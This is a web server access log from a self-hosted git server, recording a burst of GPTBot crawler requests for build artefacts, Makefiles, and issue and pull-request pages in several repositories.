"/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11108] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:17:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12025] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12026] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12025] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:17:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2flocalpycs%2fpyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 19805] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:17:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" -[17/Feb/2026:17:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json?display=source" [Client 74.7.227.38] [Length 12968] [Gzip 4.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:17:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0%2fOpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 21595] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:17:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:17:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 60213] [Gzip 16.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:17:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:17:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10878] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -[17/Feb/2026:17:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 60213] [Gzip 16.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:17:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:17:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" -[17/Feb/2026:17:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -[17/Feb/2026:17:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:17:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10942] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:17:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 59769] [Gzip 16.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:17:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10933] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:17:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:17:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10965] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:17:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 59739] [Gzip 16.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:17:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:17:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:17:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:17:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:17:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:17:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" -[17/Feb/2026:17:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10933] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:17:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:17:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10940] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:17:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:17:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:17:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" 